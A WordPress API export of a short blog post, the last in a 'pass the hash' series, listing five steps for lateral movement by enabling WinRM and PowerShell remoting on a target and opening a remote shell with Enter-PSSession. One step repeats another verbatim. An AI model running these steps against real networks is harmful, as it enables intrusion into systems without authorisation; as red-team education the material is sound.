{"id":2193,"date":"2019-10-29T10:40:27","date_gmt":"2019-10-29T09:40:27","guid":{"rendered":"http:\/\/labalec.fr\/erwan\/?p=2193"},"modified":"2019-10-31T19:32:49","modified_gmt":"2019-10-31T18:32:49","slug":"demonstrating-pth-lateral-movement-with-nthash-part-6","status":"publish","type":"post","link":"https:\/\/labalec.fr\/erwan\/?p=2193","title":{"rendered":"Demonstrating lateral movement with NTHASH Part #6"},"content":{"rendered":"<p>Last one on the \u00ab\u00a0pass the hash\u00a0\u00bb series.<br \/>\nInitially we used a remote RDP console.<br \/>\nWe then demonstrated netcat reverse shell.<br \/>\nWhat if we dont have RDP or cant\/dont want to use netcat to the remote target?<\/p>\n<p>WinRM to the rescue !<\/p>\n<p>1.Ensure WinRM is set on the attacker host : <strong>winrm quickconfig<\/strong><\/p>\n<p>2.Add trusted hosts * (or filter to an ip) on attacker host : <strong>powershell \u00ab\u00a0Set-Item WSMan:\\localhost\\Client\\TrustedHosts -Value \u00ab\u00a0*\u00a0\u00bb -Force\u00a0\u00bb<\/strong><\/p>\n<p>3.Enable psremoting on the remote target host (use wmic \/ see previous <a href=\"https:\/\/labalec.fr\/erwan\/?p=2190\" rel=\"noopener\" target=\"_blank\">article<\/a>) : <strong>powershell.exe \u00ab\u00a0enable-psremoting -force\u00a0\u00bb<\/strong><\/p>\n<p>4.Add trusted hosts * (or filter to an ip) on attacker host : <strong>powershell \u00ab\u00a0Set-Item WSMan:\\localhost\\Client\\TrustedHosts -Value \u00ab\u00a0*\u00a0\u00bb -Force\u00a0\u00bb<\/strong> (use wmic \/ see previous <a href=\"https:\/\/labalec.fr\/erwan\/?p=2190\" rel=\"noopener\" target=\"_blank\">article<\/a>)<\/p>\n<p>5.Enjoy a remote shell under powershell (from the attacker host) : <strong>Enter-PSSession -ComputerName target<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Last one on the \u00ab\u00a0pass the hash\u00a0\u00bb series. Initially we used a remote RDP console. We then demonstrated netcat reverse shell. What if we dont have RDP or cant\/dont want to use netcat to the remote target? WinRM to the rescue ! 1.Ensure WinRM is set on the attacker host : winrm quickconfig 2.Add trusted <a href='https:\/\/labalec.fr\/erwan\/?p=2193' class='excerpt-more'>[&#8230;]<\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[118],"tags":[],"class_list":["post-2193","post","type-post","status-publish","format-standard","hentry","category-nthash","category-118-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"_links":{"self":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2193","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2193"}],"version-history":[{"count":4,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2193\/revisions"}],"predecessor-version":[{"id":2223,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2193\/revisions\/2223"}],"wp:attachment":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2193"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2193"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2193"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}